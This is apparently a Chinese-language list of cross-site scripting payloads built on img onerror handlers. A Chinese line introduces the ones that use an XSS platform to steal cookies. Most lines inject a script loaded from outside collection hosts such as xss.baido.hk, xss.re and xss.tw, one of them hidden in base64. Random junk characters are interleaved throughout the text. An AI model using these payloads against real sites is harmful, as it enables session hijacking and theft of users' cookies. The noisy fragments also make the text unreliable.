<img src='non-exist.jpg'onerror="alert('xss')">; W- U0 ?$ C# [' Y6 G
<img src=# onerror=alert(123)>
: F7 p( ~9 E2 b0 j$ `<img src=# onerror=alert(document.cookie)>- {% ~' p7 i/ D! K# [, }6 r
下面是利用平台钓cookie的" c5 U4 }1 f+ b* n1 w
<img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>3 i/ q. B$ K) w- m
9 l0 c3 v) m6 x" d
, R3 A5 T* a3 H5 p6 i
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>
H& j! O4 \ b6 V& W* d<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>
" |% a+ R; H4 Q2 h2 Z“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>
/ _9 o8 V' S2 i0 U9 l<img src=1 onerror=jQuery.getScript("//xss.re/974")>
9 l: O; @$ j$ x/ F/ k<img src="#">3 j% q( L0 z/ y) H
<img src="#">0 e+ ~6 s+ K' p3 k, ^
<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>
# g2 T7 @1 C- q/ r1 f<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">% u2 n9 G$ p; |9 g1 b' k1 K
<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>
5 H( k: n5 @6 s7 H8 K0 g<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>8 q5 d3 }1 p! m) b7 w0 R
<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>. `% j) E& a* V; \- L8 X
<img src=x width="0" height="0"></img>
' u9 m2 e0 D9 O# F( u% S1 |<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>- l( d1 `' }) j- C, Z7 f7 l
<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>: {" V p$ i9 D7 T+ z
|